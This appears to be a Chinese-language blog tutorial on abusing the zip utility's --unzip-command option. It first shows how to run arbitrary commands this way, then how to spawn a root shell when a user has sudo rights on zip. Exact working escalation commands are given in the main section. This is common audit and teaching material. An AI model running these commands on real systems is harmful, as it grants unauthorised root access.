使用Zip命令进行本地提权(类Unix系统)
使用Zip命令进行本地提权(类Unix系统)
Zip定义:
Zip是一个简单的基于平台的文件打包和压缩实用程序,适用于类Unix系统,如Linux,Windows等。通过压缩文件和目录它可以帮助我们打包许多分发文件,归档文件和磁盘存储。
使用 Zip 命令执行的主要操作:
我们运行zip -h命令,查看帮助
zip -h
部分功能简介:
使用 -d 选项删除:
生成zip文件后,可以使用-d选项从存档中删除该文件;
zip -d file.zip file1.txt
使用 -u 选项更新:
要更新zip文件并将文本文件直接添加到zip文件中,我们可以使用到-u选项;
zip -u file.zip file1.txt
使用 -m 选项移动多个文件:
如果要在zip文件中移动一些不同扩展名的文件,可以使用-m选项。通过执行以下命令来移动zip文件中的所有文本文件。
zip -m 1.zip *.txt
可以通过ls -la命令检查所有文本文件是否已被移动到zip文件中;
使用 zip 执行系统命令:
其实我们可以使用zip文件来运行任何的Linux命令。首先,使用touch命令创建一个名为1.txt的文本文件。然后我们尝试通过zip命令执行Linux命令:
zip 1.zip 1.txt -T --unzip-command=“sh -c ifconfig”
可以看到,成功通过zip命令执行了系统命令!!!
利用 zip 提权 (重点)
当以更高权限运行时,zip的行为将会发生改变。
假设系统管理员已授予本地用户sudo运行zip的权限。
一旦系统被侵入则很有可能导致提权。测试用户就能以sudo用户身份以root权限来运行zip命令!!!
靶机复现:
首先,使用touch命令创建一个文件1.txt,然后通过zip文件压缩文件,并执行一个获取shell的命令。
sudo zip 1.zip 1.txt -T --unzip-command=“sh -c /bin/bash”
利用zip命令来进行提权
输入命令:
touch /tmp/tiquan
在/tmp目录下创建一个为tiquan名字的空文件;
输入命令:
sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command=“sh -c /bin/bash”
可以看到用户以root用户身份运行tar和zip命令:
可以看到,成功通过zip命令获取到受害者机器的shell!!!
参考博客:
https://www.freebuf.com/articles/system/206007.html
使用Zip命令进行本地提权(类Unix系统)相关推荐
- CVE-2014-7911 Android本地提权漏洞分析与利用
概述 前面我们了解了Android Binder机制的基本原理,当然仅仅了解是不够的,我们要做到:Know it and hack it.这篇文章我们就来分析一个和Binder相关的漏洞:CVE-20 ...
- 反编译exe软件_挖洞经验 | Panda反病毒软件本地提权漏洞分析
写在前面的话 在这篇文章中,我将跟大家讨论一个我在Panda反病毒产品中发现的一个安全漏洞(CVE-2019-12042),这是一个本地提权漏洞,该漏洞将允许攻击者在目标设备上将非特权账户提权至SYS ...
- Microsoft Windows Win32k本地提权漏洞分析
漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-2546 漏洞类型:UAF 影响范围:Windows 7 Service P ...
- Linux 系统安全 - 近期发现的 polkit pkexec 本地提权漏洞(CVE-2021-4034)修复方案
时间: 20220-1-25 事件: qualys 安全研究人员披露 CVE-2021-4034 polkit pkexec 本地提权漏洞细节. 漏洞描述: polkit pkexec 中对命令行参数 ...
- 脏牛Linux本地提权漏洞复现(CVE-2016-5195、Linux、Android、提权)
漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞 ...
- SaltStack 二修命令注入和提权漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 Salt Project 再次发布补丁,修复命令注入漏洞 (CVE-2020-28243).该漏洞影响 SaltStack Salt ...
- 开源OS FreeBSD 中 ftpd chroot 本地提权漏洞 (CVE-2020-7468) 的技术分析
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 7月份,一名匿名研究员向 ZDI 报告了 FreeBSD 中的一个本地提权漏洞.它位于 FreeBSD 的文件传输协议守护进程 (ft ...
- 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞 (下)...
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...
- 2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞(上)...
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一.他们从1000多份安全公告中遴选出这些案例,奇安信代码卫士 ...
- 【CVE-2021-4043】Linux本地提权漏洞复现
实验步骤 文章目录 实验步骤 CVE-2021-4043 Linux本地提权漏洞 实验背景 实验环境 漏洞复现 构造payload 用gcc编译后上传到阿里云 执行payload 漏洞修复 CVE-2 ...
最新文章
- c#委托与事件(二)
- Shiro框架:授权流程、授权方式、Shiro授权入门程序、自定义Realm进行授权
- 允许指定IP访问远程桌面
- org.apache.tomcat.jni.LibraryNotFoundError tcnative-1.dll 异常
- failed to connect to raw.githubusercontent.com port 443: Connection refused
- 北京理工计算机 上机复试2000年
- java提示程序包有问题_如何解决安装java时出现程序包有问题不能运行的问题?...
- 努力做一个优秀的programmer [ C# 影院售票系统]
- GWAS meta分析
- 用html做祝福语朋友,对朋友的励志祝福语大全
- 【Unity3D开发小游戏】《青蛙过河》Unity开发教程
- EasyBoot中文启动光盘制作教程
- 设计模式_访问者模式
- 西普实验吧CTF-Hashkill
- 图像处理技术:图像切割、标签、贴纸花字,超细开发详解
- windwos服务器网站504,打开网站出现504 gateway time-out的原因及解决方法
- C语言实现当前时间的前后多少秒的时间计算
- [解决方案] Mendelay无法打开pdf文档:显示 unable to open this file
- 银河麒麟Kylin_s10_sp2安装Oracle11g(FS)(亲测有效)
- 香河机器人产业园属于哪个区_廊坊香河机器人产业园首家企业投产